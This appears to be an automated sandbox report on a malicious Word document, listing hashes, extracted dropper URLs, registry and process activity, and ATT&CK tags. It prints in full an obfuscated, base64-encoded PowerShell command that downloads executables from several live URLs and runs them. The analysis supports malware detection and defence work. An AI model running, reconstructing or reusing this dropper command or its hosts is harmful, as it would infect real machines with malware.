02503f6546f32015f98eb839efb8b3d86d56b8ab5de5a30b5d6e99b4bd41802d

Analysis

max time kernel
121s
max time network
121s
platform
windows7_x64
resource
win7-20240903-en
resource tags

arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
submitted
20-09-2024 18:06

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

ee258684b0fd453e48c84b57327b8225_JaffaCakes118.doc
Size

160KB
MD5

ee258684b0fd453e48c84b57327b8225
SHA1

e3921f7d38b52ee18f289ef29057e1836cd9b504
SHA256

02503f6546f32015f98eb839efb8b3d86d56b8ab5de5a30b5d6e99b4bd41802d
SHA512

2a3b1f513eb8bb20158e508abec2b59055650a1373df2e78b3658340a144fc4813784eb8f8451af8142ba86a527af0404db95ad9152e2291965288c455090e79
SSDEEP

1536:TB445TEgrO3jSWAg83tle1ZZ0293QM0eetR2cOupLB5UZ5F+a9wPzlnb3mSZ:T22TWTogk079THcpOu5UZ2P5b3mSZ

Score

10^/10

discovery

Malware Config

Extracted

Language

ps1

Source

URLs

exe.dropper

http://jobcapper.com/8.7.19/hrS/

exe.dropper

http://scoomie.com/wp-content/uploads/mxjsB/

exe.dropper

https://blog.workshots.net/bibqcr9/Eki/

exe.dropper

https://hxoptical.net/wp-admin/91C/

exe.dropper

https://adidasnmdfootlocker.com/nc_assets/F/

exe.dropper

http://socylmediapc.es/tools/D7Ogq/

exe.dropper

http://lombardzista.pl/wp-content/r/

Signatures

Blocklisted process makes network request 14 IoCs

flow	pid	Process
3	2624	POWeRsHeLL.exe
4	2624	POWeRsHeLL.exe
5	2624	POWeRsHeLL.exe
9	2624	POWeRsHeLL.exe
10	2624	POWeRsHeLL.exe
12	2624	POWeRsHeLL.exe
14	2624	POWeRsHeLL.exe
16	2624	POWeRsHeLL.exe
17	2624	POWeRsHeLL.exe
19	2624	POWeRsHeLL.exe
20	2624	POWeRsHeLL.exe
22	2624	POWeRsHeLL.exe
23	2624	POWeRsHeLL.exe
24	2624	POWeRsHeLL.exe

Drops file in System32 directory 1 IoCs

description	ioc	Process
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	POWeRsHeLL.exe

Drops file in Windows directory 1 IoCs

description	ioc	Process
File opened for modification	C:\Windows\Debug\WIA\wiatrace.log	WINWORD.EXE

System Location Discovery: System Language Discovery 1 TTPs 1 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WINWORD.EXE

Office loads VBA resources, possible macro or embedded object present

Modifies registry class 64 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000_CLASSES\Wow6432Node\Interface\{978C9E22-D4B0-11CE-BF2D-00AA003F40D0}	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000_CLASSES\Wow6432Node\Interface\{7B020EC1-AF6C-11CE-9F46-00AA00574A4F}	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000_CLASSES\Wow6432Node\Interface\{8BD21D32-EC42-11CE-9E0D-00AA006002F3}	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000_CLASSES\Interface\{82B02370-B5BC-11CF-810F-00A0C9030074}\ = "IReturnInteger"	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000_CLASSES\Interface\{5512D113-5CC6-11CF-8D67-00AA00BDCE1D}	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000_CLASSES\Interface\{5512D117-5CC6-11CF-8D67-00AA00BDCE1D}\ = "IWHTMLCheckbox"	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000_CLASSES\Interface\{5512D11D-5CC6-11CF-8D67-00AA00BDCE1D}	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{B02564D2-BBA1-4151-9014-2AAC0492826E}\2.0\HELPDIR\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\VBE"	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000_CLASSES\Interface\{944ACF93-A1E6-11CE-8104-00AA00611080}\ = "Tabs"	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000_CLASSES\Interface\{04598FC6-866C-11CF-AB7C-00AA00C08FCF}\ = "IControl"	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000_CLASSES\Interface\{29B86A70-F52E-11CE-9BCE-00AA00608E01}	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000_CLASSES\Interface\{796ED650-5FE9-11CF-8D68-00AA00BDCE1D}\ = "WHTMLControlEvents"	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000_CLASSES\Interface\{92E11A03-7358-11CE-80CB-00AA00611080}	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000_CLASSES\Interface\{92E11A03-7358-11CE-80CB-00AA00611080}\ = "Pages"	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{B02564D2-BBA1-4151-9014-2AAC0492826E}\2.0\0	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000_CLASSES\TypeLib\{B02564D2-BBA1-4151-9014-2AAC0492826E}\2.0	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000_CLASSES\Interface\{5512D111-5CC6-11CF-8D67-00AA00BDCE1D}	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000_CLASSES\Wow6432Node\Interface\{7B020EC1-AF6C-11CE-9F46-00AA00574A4F}\ = "CommandButtonEvents"	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000_CLASSES\Wow6432Node\Interface\{EC72F590-F375-11CE-B9E8-00AA006B1A69}	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000_CLASSES\Wow6432Node\Interface\{8A683C90-BA84-11CF-8110-00A0C9030074}\ = "IReturnSingle"	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000_CLASSES\Wow6432Node\Interface\{796ED650-5FE9-11CF-8D68-00AA00BDCE1D}	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000_CLASSES\Interface\{8A683C90-BA84-11CF-8110-00A0C9030074}	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000_CLASSES\Wow6432Node\Interface\{8BD21D33-EC42-11CE-9E0D-00AA006002F3}\ = "IMdcCombo"	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000_CLASSES\Interface\{47FF8FE1-6198-11CF-8CE8-00AA006CB389}\ = "WHTMLControlEvents2"	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000_CLASSES\Interface\{9A4BBF53-4E46-101B-8BBD-00AA003E3B29}	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000_CLASSES\Wow6432Node\Interface\{5512D111-5CC6-11CF-8D67-00AA00BDCE1D}\ = "IWHTMLSubmitButton"	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000_CLASSES\Wow6432Node\Interface\{7B020EC2-AF6C-11CE-9F46-00AA00574A4F}	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000_CLASSES\Interface\{04598FC1-866C-11CF-AB7C-00AA00C08FCF}	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000_CLASSES\Wow6432Node\Interface\{8BD21D33-EC42-11CE-9E0D-00AA006002F3}	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000_CLASSES\Interface\{978C9E22-D4B0-11CE-BF2D-00AA003F40D0}	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000_CLASSES\Interface\{8BD21D43-EC42-11CE-9E0D-00AA006002F3}\ = "IMdcCheckBox"	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000_CLASSES\Interface\{944ACF93-A1E6-11CE-8104-00AA00611080}	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000_CLASSES\Interface\{8BD21D32-EC42-11CE-9E0D-00AA006002F3}\ = "MdcComboEvents"	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000_CLASSES\Wow6432Node\Interface\{7B020EC7-AF6C-11CE-9F46-00AA00574A4F}	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000_CLASSES\Wow6432Node\Interface\{5512D115-5CC6-11CF-8D67-00AA00BDCE1D}\ = "IWHTMLReset"	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000_CLASSES\Interface\{5512D11F-5CC6-11CF-8D67-00AA00BDCE1D}\ = "IWHTMLPassword"	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000_CLASSES\Wow6432Node\Interface\{8BD21D32-EC42-11CE-9E0D-00AA006002F3}\ = "MdcComboEvents"	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000_CLASSES\Interface\{47FF8FE4-6198-11CF-8CE8-00AA006CB389}\ = "WHTMLControlEvents5"	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000_CLASSES\Wow6432Node\Interface\{79176FB2-B7F2-11CE-97EF-00AA006D2776}\ = "SpinbuttonEvents"	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{B02564D2-BBA1-4151-9014-2AAC0492826E}\2.0\FLAGS	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000_CLASSES\Wow6432Node\Interface\{BEF6E003-A874-101A-8BBA-00AA00300CAB}\ = "Font"	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000_CLASSES\Interface\{7B020EC2-AF6C-11CE-9F46-00AA00574A4F}\ = "ScrollbarEvents"	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000_CLASSES\Interface\{4C5992A5-6926-101B-9992-00000B65C6F9}	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000_CLASSES\Wow6432Node\Interface\{8BD21D22-EC42-11CE-9E0D-00AA006002F3}\ = "MdcListEvents"	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000_CLASSES\Wow6432Node\Interface\{79176FB2-B7F2-11CE-97EF-00AA006D2776}	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000_CLASSES\Wow6432Node\Interface\{47FF8FE4-6198-11CF-8CE8-00AA006CB389}	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000_CLASSES\Wow6432Node\Interface\{47FF8FE9-6198-11CF-8CE8-00AA006CB389}\ = "WHTMLControlEvents10"	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000_CLASSES\Interface\{82B02371-B5BC-11CF-810F-00A0C9030074}	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000_CLASSES\Wow6432Node\Interface\{04598FC6-866C-11CF-AB7C-00AA00C08FCF}\ = "IControl"	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000_CLASSES\Interface\{8BD21D33-EC42-11CE-9E0D-00AA006002F3}	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000_CLASSES\Interface\{47FF8FE2-6198-11CF-8CE8-00AA006CB389}	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000_CLASSES\Wow6432Node\Interface\{47FF8FE4-6198-11CF-8CE8-00AA006CB389}\ = "WHTMLControlEvents5"	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000_CLASSES\Interface\{47FF8FE5-6198-11CF-8CE8-00AA006CB389}	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000_CLASSES\Interface\{5CEF5613-713D-11CE-80C9-00AA00611080}	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000_CLASSES\Wow6432Node\Interface\{EC72F590-F375-11CE-B9E8-00AA006B1A69}\ = "IDataAutoWrapper"	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000_CLASSES\Wow6432Node\Interface\{82B02370-B5BC-11CF-810F-00A0C9030074}\ = "IReturnInteger"	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000_CLASSES\Interface\{5512D123-5CC6-11CF-8D67-00AA00BDCE1D}	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000_CLASSES\Interface\{82B02370-B5BC-11CF-810F-00A0C9030074}	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000_CLASSES\Interface\{5512D117-5CC6-11CF-8D67-00AA00BDCE1D}	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000_CLASSES\Interface\{8BD21D23-EC42-11CE-9E0D-00AA006002F3}\ = "IMdcList"	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000_CLASSES\Interface\{5512D11B-5CC6-11CF-8D67-00AA00BDCE1D}\ = "IWHTMLText"	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000_CLASSES\Interface\{8BD21D43-EC42-11CE-9E0D-00AA006002F3}	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000_CLASSES\Interface\{7B020EC1-AF6C-11CE-9F46-00AA00574A4F}	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000_CLASSES\TypeLib\{B02564D2-BBA1-4151-9014-2AAC0492826E}\2.0\FLAGS	WINWORD.EXE

Suspicious behavior: AddClipboardFormatListener 1 IoCs

pid	Process
2252	WINWORD.EXE

Suspicious behavior: EnumeratesProcesses 1 IoCs

pid	Process
2624	POWeRsHeLL.exe

Suspicious use of AdjustPrivilegeToken 1 IoCs

description	pid	Process
Token: SeDebugPrivilege	2624	POWeRsHeLL.exe

Suspicious use of SetWindowsHookEx 2 IoCs

pid	Process
2252	WINWORD.EXE
2252	WINWORD.EXE

Suspicious use of WriteProcessMemory 4 IoCs

description	pid	Process	procid_target
PID 2252 wrote to memory of 2912	2252	WINWORD.EXE	35
PID 2252 wrote to memory of 2912	2252	WINWORD.EXE	35
PID 2252 wrote to memory of 2912	2252	WINWORD.EXE	35
PID 2252 wrote to memory of 2912	2252	WINWORD.EXE	35

C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
"C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\ee258684b0fd453e48c84b57327b8225_JaffaCakes118.doc"
1⤵
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Modifies registry class
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2252
- C:\Windows\splwow64.exe
  C:\Windows\splwow64.exe 12288
  2⤵
  PID:2912

C:\Windows\System32\WindowsPowerShell\v1.0\POWeRsHeLL.exe
POWeRsHeLL -ENCOD JABFAGEAcAB5AHEAYQBkAD0AKAAoACcATgAnACsAJwBoAGsAbgAnACkAKwAnADcAZgAnACsAJwB1ACcAKQA7AC4AKAAnAG4AZQB3ACcAKwAnAC0AaQAnACsAJwB0AGUAbQAnACkAIAAkAGUATgB2ADoAdQBzAGUAcgBQAHIAbwBGAEkAbABFAFwAVgBkAHIAUQB0AGUAcABcAFEARAA2AHIATgBCADUAXAAgAC0AaQB0AGUAbQB0AHkAcABlACAAZABpAHIAZQBDAFQAbwByAHkAOwBbAE4AZQB0AC4AUwBlAHIAdgBpAGMAZQBQAG8AaQBuAHQATQBhAG4AYQBnAGUAcgBdADoAOgAiAFMARQBDAGAAVQBSAEkAVAB5AHAAcgBvAHQAYABvAGMAbwBsACIAIAA9ACAAKAAnAHQAbAAnACsAJwBzACcAKwAoACcAMQAyACcAKwAnACwAJwApACsAKAAnACAAdABsACcAKwAnAHMAMQAxACwAJwApACsAKAAnACAAJwArACcAdABsAHMAJwApACkAOwAkAE0AawAzAHMANQBhADgAIAA9ACAAKAAoACcAQgBnAGQAJwArACcAegBjAGEAJwApACsAJwAzACcAKwAnADUAaAAnACkAOwAkAFkANAB1AHEAcgBxAHIAPQAoACcASAAnACsAKAAnADUAdwAnACsAJwBqAHUAJwApACsAJwA1AGEAJwApADsAJABZAHgAXwB2ADgAcAA4AD0AJABlAG4AdgA6AHUAcwBlAHIAcAByAG8AZgBpAGwAZQArACgAKAAnAHsAMAAnACsAJwB9AFYAZAByAHEAdABlAHAAewAwAH0AUQBkACcAKwAoACcANgByAG4AYgAnACsAJwA1ACcAKQArACcAewAnACsAJwAwAH0AJwApAC0AZgBbAEMAaABBAFIAXQA5ADIAKQArACQATQBrADMAcwA1AGEAOAArACgAJwAuACcAKwAoACcAZQAnACsAJwB4AGUAJwApACkAOwAkAFgAbQA1AGMAMQBzAHUAPQAoACcASwAnACsAKAAnAGcAMAAnACsAJwBlAHgAZwAnACkAKwAnAGoAJwApADsAJABHAHkAbABtAGsAcAB2AD0ALgAoACcAbgBlAHcALQBvAGIAJwArACcAagAnACsAJwBlAGMAJwArACcAdAAnACkAIABuAGUAdAAuAFcAZQBCAGMATABJAGUATgBUADsAJABPAHEAYQA0AHgAeQB4AD0AKAAnAGgAdAAnACsAKAAnAHQAcAA6AC8ALwAnACsAJwBqACcAKwAnAG8AYgBjACcAKQArACgAJwBhACcAKwAnAHAAJwArACcAcABlAHIALgBjAG8AbQAnACsAJwAvADgALgA3AC4AMQAnACkAKwAoACcAOQAvAGgAcgBTAC8AKgBoAHQAJwArACcAdABwADoAJwArACcALwAvAHMAYwAnACsAJwBvACcAKwAnAG8AbQBpACcAKwAnAGUALgAnACkAKwAnAGMAbwAnACsAKAAnAG0AJwArACcALwB3AHAAJwApACsAKAAnAC0AYwBvAG4AdAAnACsAJwBlAG4AdAAvACcAKwAnAHUAcABsACcAKQArACgAJwBvACcAKwAnAGEAZABzAC8AJwApACsAJwBtAHgAJwArACgAJwBqACcAKwAnAHMAQgAvACoAaAB0ACcAKwAnAHQAJwApACsAKAAnAHAAcwAnACsAJwA6ACcAKQArACcALwAvACcAKwAoACcAYgAnACsAJwBsAG8AZwAuAHcAbwByAGsAJwApACsAKAAnAHMAJwArACcAaABvAHQAcwAnACkAKwAnAC4AJwArACcAbgBlACcAKwAoACcAdAAvACcAKwAnAGIAJwArACcAaQBiAHEAYwAnACkAKwAnAHIAOQAnACsAJwAvACcAKwAnAEUAawAnACsAKAAnAGkAJwArACcALwAqACcAKQArACgAJwBoAHQAdABwACcAKwAnAHMAOgAvACcAKwAnAC8AaAAnACkAKwAnAHgAJwArACcAbwAnACsAKAAnAHAAdABpACcAKwAnAGMAJwApACsAKAAnAGEAbAAnACsAJwAuAG4AJwApACsAJwBlACcAKwAnAHQAJwArACgAJwAvAHcAJwArACcAcAAnACkAKwAoACcALQAnACsAJwBhAGQAbQAnACkAKwAnAGkAbgAnACsAKAAnAC8AOQAnACsAJwAxAEMALwAnACsAJwAqACcAKwAnAGgAdAB0AHAAcwAnACsAJwA6AC8AJwApACsAKAAnAC8AYQBkACcAKwAnAGkAJwApACsAKAAnAGQAJwArACcAYQBzACcAKQArACgAJwBuAG0AZABmACcAKwAnAG8AJwApACsAKAAnAG8AdAAnACsAJwBsAG8AYwBrAGUAJwApACsAJwByAC4AJwArACgAJwBjAG8AbQAnACsAJwAvACcAKQArACgAJwBuAGMAXwBhACcAKwAnAHMAcwAnACsAJwBlAHQAJwApACsAJwBzACcAKwAnAC8ARgAnACsAJwAvACoAJwArACcAaAAnACsAKAAnAHQAdABwADoALwAnACsAJwAvACcAKQArACcAcwBvACcAKwAnAGMAJwArACgAJwB5AGwAJwArACcAbQAnACkAKwAoACcAZQAnACsAJwBkAGkAYQAnACkAKwAnAHAAJwArACcAYwAuACcAKwAoACcAZQBzAC8AJwArACcAdABvACcAKwAnAG8AbABzAC8ARAA3ACcAKQArACgAJwBPAGcAJwArACcAcQAnACkAKwAoACcALwAqAGgAJwArACcAdAB0ACcAKQArACgAJwBwADoAJwArACcALwAvAGwAJwApACsAKAAnAG8AbQBiAGEAJwArACcAcgBkAHoAJwArACcAaQBzAHQAYQAuACcAKQArACcAcABsACcAKwAnAC8AJwArACcAdwAnACsAKAAnAHAAJwArACcALQBjAG8AJwApACsAJwBuACcAKwAnAHQAJwArACgAJwBlAG4AJwArACcAdAAvAHIAJwApACsAJwAvACcAKQAuACIAUwBQAGwAYABpAHQAIgAoAFsAYwBoAGEAcgBdADQAMgApADsAJABNAGMAYwBrAHYAZAAxAD0AKAAnAFgANAAnACsAKAAnADUAMgBtACcAKwAnADQAJwApACsAJwB4ACcAKQA7AGYAbwByAGUAYQBjAGgAKAAkAFoAMABnADkANAB1AHIAIABpAG4AIAAkAE8AcQBhADQAeAB5AHgAKQB7AHQAcgB5AHsAJABHAHkAbABtAGsAcAB2AC4AIgBEAE8AVwBgAE4AbABvAGEAZABgAEYASQBsAEUAIgAoACQAWgAwAGcAOQA0AHUAcgAsACAAJABZAHgAXwB2ADgAcAA4ACkAOwAkAFIAMQBkAHEAYQBlAHkAPQAoACcARwB4ACcAKwAoACcAYQBsAHMAbQAnACsAJwBxACcAKQApADsASQBmACAAKAAoACYAKAAnAEcAZQB0ACcAKwAnAC0ASQAnACsAJwB0AGUAbQAnACkAIAAkAFkAeABfAHYAOABwADgAKQAuACIATABFAG4AZwBgAFQAaAAiACAALQBnAGUAIAAyADIANwA2ADIAKQAgAHsALgAoACcASQBuAHYAbwBrAGUALQAnACsAJwBJAHQAJwArACcAZQBtACcAKQAoACQAWQB4AF8AdgA4AHAAOAApADsAJABBADQAcwAyADIAMwA1AD0AKAAnAFkAJwArACgAJwBnADkAeQA1ACcAKwAnAHUAeAAnACkAKQA7AGIAcgBlAGEAawA7ACQAUgBxADkAYwA0AHYAbQA9ACgAKAAnAFEAJwArACcAYQA5ACcAKQArACcAYwBwACcAKwAnAG4AdQAnACkAfQB9AGMAYQB0AGMAaAB7AH0AfQAkAFMAZwBtAF8AZQB0ADkAPQAoACgAJwBIADYAYgAnACsAJwAwADEAJwApACsAJwAzAHAAJwApAA==
1⤵
- Blocklisted process makes network request
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2624

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Roaming\Microsoft\Templates\Normal.dotm

Filesize
19KB

MD5
ec0c0e2746bccf0e9fc8c84f3e05274f

SHA1
ec3130b49728ff40b8364048883e665e398596e3

SHA256
cb5b56c130f74b3ce5e7f84407691a72d71e6d6a8277643b66403ae5c39bc4d9

SHA512
ee86823d62040e39ee614a454457b5cae5fd1e70ddc74ed37906049fdc8762b3e919bf358adbbbd5322569bc6f9037448316ab622156890f12f9f9199484373b

Download Submit
memory/2252-18-0x0000000000640000-0x0000000000740000-memory.dmp

Filesize
1024KB

Download
memory/2252-46-0x0000000000640000-0x0000000000740000-memory.dmp

Filesize
1024KB

Download
memory/2252-5-0x0000000000640000-0x0000000000740000-memory.dmp

Filesize
1024KB

Download
memory/2252-6-0x0000000000640000-0x0000000000740000-memory.dmp

Filesize
1024KB

Download
memory/2252-7-0x0000000005F60000-0x0000000006060000-memory.dmp

Filesize
1024KB

Download
memory/2252-8-0x0000000000640000-0x0000000000740000-memory.dmp

Filesize
1024KB

Download
memory/2252-9-0x0000000000640000-0x0000000000740000-memory.dmp

Filesize
1024KB

Download
memory/2252-22-0x0000000000640000-0x0000000000740000-memory.dmp

Filesize
1024KB

Download
memory/2252-21-0x0000000000640000-0x0000000000740000-memory.dmp

Filesize
1024KB

Download
memory/2252-20-0x0000000000640000-0x0000000000740000-memory.dmp

Filesize
1024KB

Download
memory/2252-17-0x0000000000640000-0x0000000000740000-memory.dmp

Filesize
1024KB

Download
memory/2252-16-0x0000000000640000-0x0000000000740000-memory.dmp

Filesize
1024KB

Download
memory/2252-15-0x0000000000640000-0x0000000000740000-memory.dmp

Filesize
1024KB

Download
memory/2252-14-0x0000000000640000-0x0000000000740000-memory.dmp

Filesize
1024KB

Download
memory/2252-13-0x0000000000640000-0x0000000000740000-memory.dmp

Filesize
1024KB

Download
memory/2252-12-0x0000000000640000-0x0000000000740000-memory.dmp

Filesize
1024KB

Download
memory/2252-11-0x0000000000640000-0x0000000000740000-memory.dmp

Filesize
1024KB

Download
memory/2252-26-0x0000000000640000-0x0000000000740000-memory.dmp

Filesize
1024KB

Download
memory/2252-19-0x0000000000640000-0x0000000000740000-memory.dmp

Filesize
1024KB

Download
memory/2252-2-0x0000000070CFD000-0x0000000070D08000-memory.dmp

Filesize
44KB

Download
memory/2252-10-0x0000000000640000-0x0000000000740000-memory.dmp

Filesize
1024KB

Download
memory/2252-27-0x0000000000640000-0x0000000000740000-memory.dmp

Filesize
1024KB

Download
memory/2252-25-0x0000000000640000-0x0000000000740000-memory.dmp

Filesize
1024KB

Download
memory/2252-31-0x0000000000640000-0x0000000000740000-memory.dmp

Filesize
1024KB

Download
memory/2252-32-0x0000000000640000-0x0000000000740000-memory.dmp

Filesize
1024KB

Download
memory/2252-30-0x0000000000640000-0x0000000000740000-memory.dmp

Filesize
1024KB

Download
memory/2252-29-0x0000000000640000-0x0000000000740000-memory.dmp

Filesize
1024KB

Download
memory/2252-28-0x0000000000640000-0x0000000000740000-memory.dmp

Filesize
1024KB

Download
memory/2252-24-0x0000000000640000-0x0000000000740000-memory.dmp

Filesize
1024KB

Download
memory/2252-23-0x0000000000640000-0x0000000000740000-memory.dmp

Filesize
1024KB

Download
memory/2252-33-0x0000000000640000-0x0000000000740000-memory.dmp

Filesize
1024KB

Download
memory/2252-72-0x0000000070CFD000-0x0000000070D08000-memory.dmp

Filesize
44KB

Download
memory/2252-71-0x000000005FFF0000-0x0000000060000000-memory.dmp

Filesize
64KB

Download
memory/2252-45-0x0000000070CFD000-0x0000000070D08000-memory.dmp

Filesize
44KB

Download
memory/2252-0-0x000000002F311000-0x000000002F312000-memory.dmp

Filesize
4KB

Download
memory/2252-47-0x0000000000640000-0x0000000000740000-memory.dmp

Filesize
1024KB

Download
memory/2252-48-0x0000000000640000-0x0000000000740000-memory.dmp

Filesize
1024KB

Download
memory/2252-1-0x000000005FFF0000-0x0000000060000000-memory.dmp

Filesize
64KB

Download
memory/2624-40-0x0000000001E70000-0x0000000001E78000-memory.dmp

Filesize
32KB

Download
memory/2624-39-0x000000001B780000-0x000000001BA62000-memory.dmp

Filesize
2.9MB

Download